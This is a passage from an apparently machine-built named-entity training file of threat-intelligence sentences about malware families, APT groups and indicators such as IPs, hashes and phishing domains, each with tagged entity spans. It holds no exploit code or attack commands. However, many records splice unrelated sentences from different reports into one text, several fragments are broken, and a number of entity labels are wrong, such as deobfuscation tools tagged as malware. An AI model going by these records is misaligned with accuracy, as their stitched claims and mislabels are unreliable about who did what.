SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire .", "spans": {"ORGANIZATION: Secureworks": [[18, 29]], "ORGANIZATION: CTU": [[80, 83]], "THREAT_ACTOR: GOLD LOWELL": [[111, 122]], "TOOL: SamSam": [[167, 173]], "ORGANIZATION: SPEAR": [[187, 192]], "MALWARE: PassCV samples": [[211, 225]], "MALWARE: RAT": [[286, 289]], "MALWARE: Netwire": [[297, 304]]}, "info": {"id": "cyberner_stix_train_002962", "source": "cyberner_stix_train"}} {"text": "A shared supplier of malware would explain the overlap in tools , but it would not explain the significant overlap we have also observed in operational techniques related to command and control infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_002963", "source": "cyberner_stix_train"}} {"text": "ChinaChopper web shell — A web-based executable script that allows a threat actor to execute commands on the compromised system .", "spans": {"MALWARE: ChinaChopper": [[0, 12]], "TOOL: web shell": [[13, 22]]}, "info": {"id": "cyberner_stix_train_002964", "source": "cyberner_stix_train"}} {"text": "Paladin RAT is another remote administration tool used by the Pitty Tiger group . The first attack in the US that Group-IB attributes to this group was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": {"TOOL: Paladin RAT": [[0, 11]], "THREAT_ACTOR: Pitty Tiger group": [[62, 79]], "ORGANIZATION: Group-IB": [[114, 122]], "ORGANIZATION: bank": [[212, 216]]}, "info": {"id": "cyberner_stix_train_002965", "source": "cyberner_stix_train"}} {"text": "It uses a variety of new techniques , but the most interesting thing is that it injects malicious code into the system libraries – libdmv.so or libandroid_runtime.so . Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services . 
In the initial versions , back in 2016 , the downloaded files from RevengeHotels campaigns were divided into two modules : a backdoor and a module to capture screenshots . Local investigators later confirmed that the energy outage was caused by a cyberattack .", "spans": {"TOOL: Metel": [[168, 173]], "TOOL: banking Trojan": [[179, 193]], "THREAT_ACTOR: Corkow": [[210, 216]], "THREAT_ACTOR: RevengeHotels": [[367, 380]], "MALWARE: backdoor": [[425, 433]], "ORGANIZATION: Local investigators": [[472, 491]], "THREAT_ACTOR: cyberattack": [[547, 558]]}, "info": {"id": "cyberner_stix_train_002966", "source": "cyberner_stix_train"}} {"text": "PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . We used a combination of tools such as NoFuserEx , ConfuserEx Fixer , ConfuserEx Switch Killer , and de4d0t in order to deobfuscate the code for in depth analysis .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: NEODYMIUM": [[15, 24]], "VULNERABILITY: zero-day exploit": [[37, 53]], "MALWARE: NoFuserEx": [[146, 155]], "MALWARE: ConfuserEx Fixer": [[158, 174]], "MALWARE: ConfuserEx Switch Killer": [[177, 201]], "MALWARE: de4d0t": [[208, 214]]}, "info": {"id": "cyberner_stix_train_002967", "source": "cyberner_stix_train"}} {"text": "One plausible reason for developing such a flexible malware might be that the group were increasingly encountering victim environments where users were using Linux as their desktop operating system .", "spans": {"SYSTEM: Linux": [[158, 163]]}, "info": {"id": "cyberner_stix_train_002968", "source": "cyberner_stix_train"}} {"text": "The domain was active on the IP 213.251.187.145 from July 2014 up until March 2015 .", "spans": {"IP_ADDRESS: 213.251.187.145": [[32, 47]]}, "info": {"id": "cyberner_stix_train_002969", "source": "cyberner_stix_train"}} {"text": "It is deployed to internally accessible servers running Internet Information Services ( IIS ) .", "spans": {"TOOL: Internet 
Information Services": [[56, 85]], "TOOL: IIS": [[88, 91]]}, "info": {"id": "cyberner_stix_train_002970", "source": "cyberner_stix_train"}} {"text": "SHA256 : e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6 .", "spans": {"FILEPATH: e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6": [[9, 73]]}, "info": {"id": "cyberner_stix_train_002971", "source": "cyberner_stix_train"}} {"text": "This lead us to estimate there to be over 2.8 billion infections in total , on around 25 Million unique devices , meaning that on average , each victim would have suffered roughly 112 swaps of innocent applications . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor . This makes the system process running malicious code a literal moving target . For our Managed Defense Customers , we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity .", "spans": {"ORGANIZATION: Linux computers": [[310, 325]], "ORGANIZATION: Managed Defense Customers": [[464, 489]], "THREAT_ACTOR: threat actor": [[581, 593]]}, "info": {"id": "cyberner_stix_train_002972", "source": "cyberner_stix_train"}} {"text": "Through their recent investigations , our forensics analysts pinpointed the initial compromise vector and post-compromise operations that led to the deployment of the destructive Shamoon malware on targeted infrastructures .", "spans": {"MALWARE: Shamoon": [[179, 186]]}, "info": {"id": "cyberner_stix_train_002973", "source": "cyberner_stix_train"}} {"text": "On September 15 and 19 , 2017 , Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties . 
We analyzed the webpage and found attackers injecting a script into the webpage .", "spans": {"ORGANIZATION: Proofpoint": [[32, 42]], "THREAT_ACTOR: group": [[95, 100]], "ORGANIZATION: shipbuilding company": [[116, 136]], "ORGANIZATION: military": [[178, 186]]}, "info": {"id": "cyberner_stix_train_002974", "source": "cyberner_stix_train"}} {"text": "Moreover , as we dived deeper into the investigation , we discovered several spyware tools for Windows that form an implant for exfiltrating sensitive data on a targeted machine . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . Cobalt Group has mainly targeted banks in Eastern Europe , Central Asia , and Southeast Asia .", "spans": {"SYSTEM: Windows": [[95, 102]], "MALWARE: backdoor": [[221, 229]], "THREAT_ACTOR: Cobalt Group": [[350, 362]]}, "info": {"id": "cyberner_stix_train_002975", "source": "cyberner_stix_train"}} {"text": "Of course , I had to investigate further .", "spans": {}, "info": {"id": "cyberner_stix_train_002976", "source": "cyberner_stix_train"}} {"text": "] pw/6 * * * * * 5 ” ( It . \bFireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . The first task of the malware is to generate an ID to identify the infected system .", "spans": {"ORGANIZATION: \bFireEye": [[28, 36]], "THREAT_ACTOR: actors": [[53, 59]], "THREAT_ACTOR: TEMP.Reaper": [[144, 155]]}, "info": {"id": "cyberner_stix_train_002977", "source": "cyberner_stix_train"}} {"text": "The source process checks the mapping between a process id and a process name . Using the Kaspersky Security Network ( KSN ) and artifacts from malware files and attack sites , we were able to trace the attacks back to March 2015 . 
They used legitimate infrastructure—the ability to post or create comments on forums and profile pages—to embed a string that the malware would decode to find and communicate with the true C2 IP address . These URLs provide access to the C2s , which then provide potential commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": {"ORGANIZATION: Kaspersky Security Network": [[90, 116]], "ORGANIZATION: KSN": [[119, 122]], "TOOL: C2": [[421, 423]]}, "info": {"id": "cyberner_stix_train_002978", "source": "cyberner_stix_train"}} {"text": "China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files .", "spans": {"MALWARE: China Chopper": [[0, 13]], "THREAT_ACTOR: attackers": [[36, 45]], "FILEPATH: CONFUCIUS_B": [[190, 201]], "FILEPATH: CONFUCIUS_A": [[224, 235]], "MALWARE: SFX binary files": [[274, 290]]}, "info": {"id": "cyberner_stix_train_002979", "source": "cyberner_stix_train"}} {"text": "EventBot uses this permission in order to achieve persistence and run in the background as a service . 
We can observe that the sample is very recent , created on Thursday , July 4 While this may be coincidental , the out-of-sequence version 3.0 sample was created ten days after we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: sample": [[127, 133]], "MALWARE: Elise Trojan": [[343, 355]], "MALWARE: Emissary": [[383, 391]]}, "info": {"id": "cyberner_stix_train_002980", "source": "cyberner_stix_train"}} {"text": "More importantly , the IP address this certificate was shared with 213.251.187.145 was previously identified as used by Sofacy Group for phishing attacks against Albanian government institutions by registering the domain qov.al and creating realistic subdomains to lure victims into visiting .", "spans": {"IP_ADDRESS: 213.251.187.145": [[67, 82]], "THREAT_ACTOR: Sofacy": [[120, 126]], "DOMAIN: qov.al": [[221, 227]]}, "info": {"id": "cyberner_stix_train_002981", "source": "cyberner_stix_train"}} {"text": "As on the desktop , mobile users need to be wary of installing applications from outside of legitimate app stores and sources and be on the lookout for bogus banking sites that ask for more information than users would normally provide on legitimate sites . As an example , specific CIA malware revealed in Year Zero is able to penetrate , infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts . Dragonfly is a cyber espionage group that has been active since at least 2011 .", "spans": {"THREAT_ACTOR: CIA": [[283, 286]], "TOOL: malware": [[287, 294]], "THREAT_ACTOR: Dragonfly": [[455, 464]]}, "info": {"id": "cyberner_stix_train_002982", "source": "cyberner_stix_train"}} {"text": "] plus/Updates/tt/parser.apk The payload can be a .dex or .apk file which is a Java-compiled Android executable . 
The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . Stolen Pencil is a threat group likely originating from DPRK that has been active since at least May 2018 .", "spans": {"SYSTEM: Android": [[93, 100]], "MALWARE: malware": [[118, 125]], "TOOL: CMD/PowerShell": [[154, 168]], "THREAT_ACTOR: attackers": [[186, 195]], "THREAT_ACTOR: Stolen Pencil": [[284, 297]]}, "info": {"id": "cyberner_stix_train_002983", "source": "cyberner_stix_train"}} {"text": "REQUEST_COMPANION_RUN_IN_BACKGROUND - let the app run in the background . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . The timeline in Figure 2 shows that the Emissary Trojan was first created ( version 1.0 ) in May 2009 and quickly received an update that resulted in version 1.1 in June 2009 .", "spans": {"MALWARE: AutoHotKey scripts": [[140, 158]], "MALWARE: Emissary Trojan": [[251, 266]]}, "info": {"id": "cyberner_stix_train_002984", "source": "cyberner_stix_train"}} {"text": "This strongly suggested that the banking Trojans , despite differing in terms of capability , belong to the same family . TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication . Based on the samples we collected and traced to 456 distinct IPs , we expect the group to be more active in the coming months as we observed changes on the versions we acquired . 
PIEHOP utilizes LIGHTWORK to issue the IEC-104 commands \" ON \" or \" OFF \" to the remote system and then immediately deletes the executable after issuing the command .", "spans": {"THREAT_ACTOR: TG-3390": [[122, 129]], "TOOL: PIEHOP": [[432, 438]], "TOOL: LIGHTWORK": [[448, 457]]}, "info": {"id": "cyberner_stix_train_002985", "source": "cyberner_stix_train"}} {"text": "Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . After monitoring and correlating the APT attack , 360 Threat Intelligence Center discovered multiple related emails to attack Colombian government agencies , financial institutions and large enterprises .", "spans": {"MALWARE: Mimikatz": [[0, 8]], "ORGANIZATION: 360 Threat Intelligence Center": [[155, 185]], "TOOL: emails": [[214, 220]], "ORGANIZATION: government agencies": [[241, 260]], "ORGANIZATION: financial institutions": [[263, 285]], "ORGANIZATION: enterprises": [[296, 307]]}, "info": {"id": "cyberner_stix_train_002986", "source": "cyberner_stix_train"}} {"text": "Parsing of instructions by EventBot Parsing of instructions by the bot from the C2 . 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . 
Since at least 2014 , an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran .", "spans": {"MALWARE: EventBot": [[27, 35]], "MALWARE: 'Improvise'": [[85, 96]], "ORGANIZATION: FireEye": [[387, 394]], "THREAT_ACTOR: APT34": [[398, 403]]}, "info": {"id": "cyberner_stix_train_002987", "source": "cyberner_stix_train"}} {"text": "sahro.bella7@post.cz trala.cosh2@post.cz bishtr.cam47@post.cz lobrek.chizh@post.cz cervot.woprov@post.cz .", "spans": {"EMAIL: sahro.bella7@post.cz": [[0, 20]], "EMAIL: trala.cosh2@post.cz": [[21, 40]], "EMAIL: bishtr.cam47@post.cz": [[41, 61]], "EMAIL: lobrek.chizh@post.cz": [[62, 82]], "EMAIL: cervot.woprov@post.cz": [[83, 104]]}, "info": {"id": "cyberner_stix_train_002988", "source": "cyberner_stix_train"}} {"text": "In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers’ networks . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": {"THREAT_ACTOR: APT10": [[16, 21]], "ORGANIZATION: IT service": [[70, 80]], "ORGANIZATION: (MSPs)": [[91, 97]], "ORGANIZATION: Kaspersky Lab": [[177, 190]], "ORGANIZATION: Microsoft Office": [[214, 230]], "VULNERABILITY: exploits": [[231, 239]], "FILEPATH: Exploit.MSWord.CVE-2010-333": [[287, 314]], "FILEPATH: Exploit.Win32.CVE-2012-0158": [[317, 344]]}, "info": {"id": "cyberner_stix_train_002989", "source": "cyberner_stix_train"}} {"text": "Malware Features Android According to the observed samples and their signatures , early versions of this Android malware were developed by the end of 2014 and the campaign has remained active ever since . First stage infections and graphical decoys have been described by multiple sources , including in our previous research MuddyWater expands operations . 
Reporting indicates there may be links between Cobalt Group and both the malware Carbanak and the group Carbanak .", "spans": {"SYSTEM: Android": [[17, 24], [105, 112]], "THREAT_ACTOR: MuddyWater": [[326, 336]], "THREAT_ACTOR: Cobalt Group": [[405, 417]], "MALWARE: Carbanak": [[439, 447]], "THREAT_ACTOR: Carbanak": [[462, 470]]}, "info": {"id": "cyberner_stix_train_002990", "source": "cyberner_stix_train"}} {"text": "SHA256 : c885f09b10feb88d7d176fe1a01ed8b480deb42324d2bb825e96fe1408e2a35f .", "spans": {"FILEPATH: c885f09b10feb88d7d176fe1a01ed8b480deb42324d2bb825e96fe1408e2a35f": [[9, 73]]}, "info": {"id": "cyberner_stix_train_002991", "source": "cyberner_stix_train"}} {"text": "Operation RussianDoll : Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia ’s APT28 in Highly-Targeted Attack .", "spans": {"TOOL: Adobe": [[24, 29]], "SYSTEM: Windows": [[32, 39]], "VULNERABILITY: Zero-Day": [[40, 48]], "THREAT_ACTOR: APT28": [[88, 93]]}, "info": {"id": "cyberner_stix_train_002992", "source": "cyberner_stix_train"}} {"text": "Adware commonly found on Play collects profits from ad networks , but mobile ransomware inflicts direct harm to users . In the same year , they conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . They also use AutoIT droppers , password-protected EXE files and even ISO images . 
CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": {"TOOL: Perl IRC bot": [[177, 189]], "TOOL: public IRC chats": [[194, 210]], "TOOL: AutoIT": [[246, 252]], "TOOL: EXE": [[283, 286]], "TOOL: ISO": [[302, 305]], "SYSTEM: CSP": [[315, 318]]}, "info": {"id": "cyberner_stix_train_002993", "source": "cyberner_stix_train"}} {"text": "By pivoting off of one sample we were able to zoom out and identify a sizable infrastructure of what appears to be 707 IP ’s and 2,611 domains being utilized for malicious activity .", "spans": {}, "info": {"id": "cyberner_stix_train_002994", "source": "cyberner_stix_train"}} {"text": "Apps not selected as protected apps stop working once the screen is off and await re-activation , so the implant is able to determine that it is running on a Huawei device and add itself to this list . However , as this recent campaign indicates , the NewsBeef APT appears to have shifted its intrusion toolset away from BeEF and towards macro-enabled malicious Office documents , PowerSploit , and Pupy . The group has been observed targeting healthcare , telecom , technology , and video game industries in 14 countries .", "spans": {"ORGANIZATION: Huawei": [[158, 164]], "THREAT_ACTOR: NewsBeef": [[252, 260]], "TOOL: Office documents": [[362, 378]], "TOOL: PowerSploit": [[381, 392]], "TOOL: Pupy": [[399, 403]]}, "info": {"id": "cyberner_stix_train_002995", "source": "cyberner_stix_train"}} {"text": "The Trojan waits for incoming SMS messages ( the “ alarmReceiver.class ” ) and checks whether these messages contain one of the following commands : “ sms ” , “ contact ” , “ location ” , “ other ” . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . 
Wingbird , the advanced malware used by NEODYMIUM , has several behaviors that trigger alerts in Windows Defender ATP .", "spans": {"MALWARE: malicious.DOC": [[286, 299]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[319, 358]], "VULNERABILITY: CVE-2012-0158": [[361, 374]], "MALWARE: Wingbird": [[377, 385]], "THREAT_ACTOR: NEODYMIUM": [[417, 426]], "ORGANIZATION: Windows Defender ATP": [[474, 494]]}, "info": {"id": "cyberner_stix_train_002996", "source": "cyberner_stix_train"}} {"text": "Check Point researchers discovered another widespread malware campaign on Google Play , Google ’ s official app store . Based on multiple active compromises by the Axiom threat group , Novetta was able to capture and analyze new Winnti malware samples . The target file is loaded using the LoadLibrary API function , and the address of the exported function zxMain is obtained with GetProcAddress . Ransomware gangs are consistently rebranding or merging with other groups , as highlighted in our 2022 Year in Review , or these actors work for multiple ransomware - as - a - service ( RaaS ) outfits at a time , and new groups are always emerging .", "spans": {"ORGANIZATION: Check Point": [[0, 11]], "SYSTEM: Google Play": [[74, 85]], "ORGANIZATION: Google": [[88, 94]], "ORGANIZATION: Novetta": [[185, 192]], "TOOL: Winnti malware samples": [[229, 251]], "MALWARE: ransomware - as - a - service ( RaaS )": [[553, 591]]}, "info": {"id": "cyberner_stix_train_002997", "source": "cyberner_stix_train"}} {"text": "CTU researchers have observed TG-3390 actors staging RAR archives , renamed with a .zip file extension , on externally accessible web servers .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[30, 37]], "TOOL: RAR": [[53, 56]], "FILEPATH: .zip": [[83, 87]]}, "info": {"id": "cyberner_stix_train_002998", "source": "cyberner_stix_train"}} {"text": ") Upload and purge collected evidence Destroy device by resetting locking password Execute shell commands Send 
SMS with defined content or location Disable network Disable root Uninstall bot To avoid detection and removal of the agent app in the device memory , the RCSAndroid suite also detects emulators or sandboxes , obfuscates code using DexGuard , uses ELF string obfuscator , and adjusts the OOM ( out-of-memory ) value . Flying Kitten was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of government and foreign espionage targets . Unflattening the code in later maturity levels like MMAT_GLBOPT1 and MMAT_GLBOPT2 ( first and second pass of global optimization ) s determines offsets within files for encryption to control encryption speed .", "spans": {"MALWARE: RCSAndroid": [[266, 276]], "SYSTEM: DexGuard": [[343, 351]], "THREAT_ACTOR: Flying Kitten": [[429, 442]], "THREAT_ACTOR: groups": [[464, 470]], "THREAT_ACTOR: threat actor": [[501, 513]], "ORGANIZATION: government": [[567, 577]], "THREAT_ACTOR: espionage": [[590, 599]], "TOOL: MMAT_GLBOPT1": [[662, 674]], "TOOL: MMAT_GLBOPT2": [[679, 691]]}, "info": {"id": "cyberner_stix_train_002999", "source": "cyberner_stix_train"}} {"text": "Our researchers examined the domain that hosted the first malicious file , mol.com-ho.me .", "spans": {"DOMAIN: mol.com-ho.me": [[75, 88]]}, "info": {"id": "cyberner_stix_train_003000", "source": "cyberner_stix_train"}} {"text": "Analysis indicates there are currently two distinct variants of ViperRAT . Continued WhiteBear activity later shifted to include defense-related organizations into June 2017 . On a Windows machine , the netsvc group contains names of both existing and non-existing services . $ HOME / Library / LaunchAgents / com.studentd.agent.plist", "spans": {"MALWARE: ViperRAT": [[64, 72]], "ORGANIZATION: defense-related organizations": [[129, 158]], "SYSTEM: Windows": [[181, 188]], "TOOL: netsvc": [[203, 209]]}, "info": {"id": "cyberner_stix_train_003001", "source": "cyberner_stix_train"}} {"text": "] XXXX [ . 
While investigating the domains and infrastructure used by the phishing components of Gorgon Group , Unit 42 researchers witnessed several common operational security flaws with Gorgon Group 's actors throughout their many campaigns . And the last change that was introduced in regards to ConfuserEx obfuscator , an obfuscator that is very commonly used by malicious actors to obfuscate .NET code , is used with various levels of obfuscation , anti - tampering and anti - debugging , which makes the unpacking more difficult for malware researchers .", "spans": {"THREAT_ACTOR: Gorgon Group": [[97, 109]], "ORGANIZATION: Unit 42": [[112, 119]], "THREAT_ACTOR: Gorgon Group 's actors": [[189, 211]], "TOOL: ConfuserEx": [[300, 310]], "THREAT_ACTOR: malicious actors": [[368, 384]], "MALWARE: .NET code": [[398, 407]]}, "info": {"id": "cyberner_stix_train_003002", "source": "cyberner_stix_train"}} {"text": "Unit 74455 's members would be responsible for the distribution of some of the stolen data from the breaches through the \" DCLeaks \" and \" Guccifer 2.0 \" websites .", "spans": {"THREAT_ACTOR: Unit 74455": [[0, 10]], "THREAT_ACTOR: DCLeaks": [[123, 130]], "THREAT_ACTOR: Guccifer": [[139, 147]]}, "info": {"id": "cyberner_stix_train_003003", "source": "cyberner_stix_train"}} {"text": "To show how this breach and similar breaches can be mitigated , we look at how Windows Defender Advanced Threat Protection ( Windows Defender ATP ) flags activities associated with BARIUM , LEAD , and other known activity groups and how it provides extensive threat intelligence about these groups .", "spans": {"TOOL: Windows Defender Advanced Threat Protection": [[79, 122]], "TOOL: Windows Defender ATP": [[125, 145]], "THREAT_ACTOR: BARIUM": [[181, 187]], "THREAT_ACTOR: LEAD": [[190, 194]]}, "info": {"id": "cyberner_stix_train_003004", "source": "cyberner_stix_train"}} {"text": "This malware has used the IP S-PROT addresses identified in the accompanying .csv and .stix files as both source and 
destination IPs .", "spans": {"TOOL: IP S-PROT addresses": [[26, 45]], "FILEPATH: .csv": [[77, 81]], "FILEPATH: .stix": [[86, 91]], "TOOL: IPs": [[129, 132]]}, "info": {"id": "cyberner_stix_train_003005", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //www [ . FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 . It should be noted that out of the roughly 180 Word variants that were located by Carbon Black , the biggest difference in the documents was the metadata and junk data located in the malicious macros . However , we note that the wiper deployment was limited to the victim ’s IT environment and did not impact the hypervisor or the SCADA virtual machine .", "spans": {"ORGANIZATION: FireEye": [[23, 30]], "ORGANIZATION: hospitality sector": [[85, 103]], "THREAT_ACTOR: actor APT28": [[129, 140]], "TOOL: Word": [[190, 194]], "ORGANIZATION: Carbon Black": [[225, 237]], "SYSTEM: SCADA virtual machine": [[474, 495]]}, "info": {"id": "cyberner_stix_train_003006", "source": "cyberner_stix_train"}} {"text": "We have been able to tie the malware to a long-running Facebook profile that we observed promoting the first stage of this family , a malicious chat application called Dardesh via links to Google Play . We are confident this KillDisk malware was deployed by Lazarus , rather than by another , unrelated attacker . Despite what the gateway does, this attack would only succeed if the message got through the gateway and a particular archive utility is used by the end-user, such as certain versions of PowerArchiver , WinRar , and older 7Zip as described . 
The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to •", "spans": {"ORGANIZATION: Facebook": [[55, 63]], "MALWARE: Dardesh": [[168, 175]], "SYSTEM: Google Play": [[189, 200]], "TOOL: KillDisk malware": [[225, 241]], "THREAT_ACTOR: Lazarus": [[258, 265]], "THREAT_ACTOR: attacker": [[303, 311]], "TOOL: PowerArchiver": [[501, 514]], "TOOL: WinRar": [[517, 523]], "TOOL: 7Zip": [[536, 540]], "ORGANIZATION: Microsoft": [[641, 650]]}, "info": {"id": "cyberner_stix_train_003007", "source": "cyberner_stix_train"}} {"text": "Another interesting ZeroT sample ( SHA256 bc2246813d7267608e1a80a04dac32da9115a15b1550b0c4842b9d6e2e7de374 ) contained the executable 0228.exe and a decoy document 0228.doc in the RAR SFX archive .", "spans": {"MALWARE: ZeroT": [[20, 25]], "FILEPATH: bc2246813d7267608e1a80a04dac32da9115a15b1550b0c4842b9d6e2e7de374": [[42, 106]], "FILEPATH: 0228.exe": [[134, 142]], "FILEPATH: 0228.doc": [[164, 172]], "TOOL: RAR": [[180, 183]], "TOOL: SFX": [[184, 187]]}, "info": {"id": "cyberner_stix_train_003008", "source": "cyberner_stix_train"}} {"text": "Such data includes contact and location information , phone and message activity , the ability to record from the microphone , camera , and other sensors as well as the capability to access data from many popular messaging and social media apps . APT41 has targeted payment services specializing in handling in-game transactions and real money transfer (RMT) purchases . 
This neatly ties together many of the tools used by the Dukes group , as versions of this one loader have been used to load malware from three different Dukes-related toolsets CosmicDuke , PinchDuke , and MiniDuke – over the course of five years .", "spans": {"THREAT_ACTOR: APT41": [[247, 252]], "ORGANIZATION: payment services": [[266, 282]], "THREAT_ACTOR: Dukes group": [[427, 438]], "MALWARE: CosmicDuke": [[547, 557]], "MALWARE: PinchDuke": [[560, 569]], "MALWARE: MiniDuke": [[576, 584]]}, "info": {"id": "cyberner_stix_train_003009", "source": "cyberner_stix_train"}} {"text": "] nampriknum [ . The malware samples deployed in both of these operations are updated versions of the KeyBoy backdoor first discussed in 2013 by Rapid7 . As the old saying goes : If it ain’t broke , don’t fix it . Fake browser updates are a very common decoy used by malware authors .", "spans": {"TOOL: KeyBoy backdoor": [[102, 117]], "ORGANIZATION: Rapid7": [[145, 151]], "MALWARE: Fake browser updates": [[214, 234]], "THREAT_ACTOR: malware authors": [[267, 282]]}, "info": {"id": "cyberner_stix_train_003010", "source": "cyberner_stix_train"}} {"text": "Infection During installation , depending on the version of the Trojan , Asacub prompts the user either for Device Administrator rights or for permission to use AccessibilityService . One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets ( see Figure 8 ) , and an HTTPBrowser installer disguised as an image file . We also found the init0 script running ; the script cleans out all miners regardless of its origin . 
Additionally , Mandiant was able to uncover additional infrastructure due to the fact that a PTR record was never changed from a previous operation .", "spans": {"MALWARE: Asacub": [[73, 79]], "ORGANIZATION: CTU": [[215, 218]], "TOOL: PDF file": [[254, 262]], "TOOL: HTTPBrowser installer": [[329, 350]], "FILEPATH: init0": [[398, 403]]}, "info": {"id": "cyberner_stix_train_003011", "source": "cyberner_stix_train"}} {"text": "The Center for Experimental Mechanical Engineering develops weapons as well as military and special equipment .", "spans": {"ORGANIZATION: The Center for Experimental Mechanical Engineering": [[0, 50]]}, "info": {"id": "cyberner_stix_train_003012", "source": "cyberner_stix_train"}} {"text": "Investigators found that John Podesta , Hillary Clinton ’s presidential campaign chairman , was one of thousands of individuals targeted in a mass phishing scheme using shortened URLs that security researchers attributed to APT28 .", "spans": {"THREAT_ACTOR: APT28": [[224, 229]]}, "info": {"id": "cyberner_stix_train_003013", "source": "cyberner_stix_train"}} {"text": "By late 2015 , the malware ’ s creators had gone mostly silent until the summer of 2016 when the malware reappeared with a more complex architecture that injects malicious code into Android system processes . We have moderate confidence APT39 operations are conducted in support of Iranian national interests based on regional targeting patterns focused in the Middle East . will always produce the value -1 . 
Days later , KillNet claimed to target the European Investment Bank ( EIB ) .", "spans": {"SYSTEM: Android": [[182, 189]], "THREAT_ACTOR: APT39": [[237, 242]], "ORGANIZATION: European Investment Bank": [[453, 477]], "ORGANIZATION: EIB": [[480, 483]]}, "info": {"id": "cyberner_stix_train_003014", "source": "cyberner_stix_train"}} {"text": "Through our investigation , we identified less than 3 dozen devices affected by Chrysaor , we have disabled Chrysaor on those devices , and we have notified users of all known affected devices . Analysis of RASPITE tactics , techniques , and procedures ( TTPs ) indicate the group has been active in some form since early - to mid-2017 . The payload code is started very early during the execution of the backdoored executable file . The gang attacked 10 victims last month , the majority of them being from the Information and Communications Technology ( ICT ) sectors .", "spans": {"MALWARE: Chrysaor": [[80, 88], [108, 116]], "THREAT_ACTOR: RASPITE": [[207, 214]], "THREAT_ACTOR: group": [[275, 280]], "ORGANIZATION: Information and Communications Technology ( ICT ) sectors": [[512, 569]]}, "info": {"id": "cyberner_stix_train_003015", "source": "cyberner_stix_train"}} {"text": "BootComplete starts the AutoStartup service and the AutoStartup service makes sure that MainActivity is always running . To control ATMs , the group uses the Atmosphere Trojan , which is unique to Silence , or a program called xfs-disp.exe . 
However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team .", "spans": {"THREAT_ACTOR: group": [[143, 148]], "TOOL: Atmosphere Trojan": [[158, 175]], "THREAT_ACTOR: Silence": [[197, 204]], "MALWARE: xfs-disp.exe": [[227, 239]], "THREAT_ACTOR: Cleaver": [[280, 287]], "THREAT_ACTOR: Cyber Army": [[341, 351]], "THREAT_ACTOR: Ashiyane": [[354, 362]], "ORGANIZATION: Syrian Electronic Army": [[385, 407]]}, "info": {"id": "cyberner_stix_train_003016", "source": "cyberner_stix_train"}} {"text": "In the months leading up to August , the Sofacy group launched several waves of attacks relying on zero-day exploits in Microsoft Office , Oracle Sun Java , Adobe Flash Player and Windows itself .", "spans": {"THREAT_ACTOR: Sofacy": [[41, 47]], "VULNERABILITY: zero-day": [[99, 107]], "ORGANIZATION: Microsoft": [[120, 129]], "TOOL: Office": [[130, 136]], "TOOL: Oracle": [[139, 145]], "TOOL: Java": [[150, 154]], "TOOL: Adobe": [[157, 162]], "TOOL: Flash": [[163, 168]], "TOOL: Player": [[169, 175]], "SYSTEM: Windows": [[180, 187]]}, "info": {"id": "cyberner_stix_train_003017", "source": "cyberner_stix_train"}} {"text": "We will also provide detailed analysis of the latest variants of the malware they deploy ( known as FakeM ) as well as other associated tools that allow Scarlet Mimic to target Android and OS X devices . 
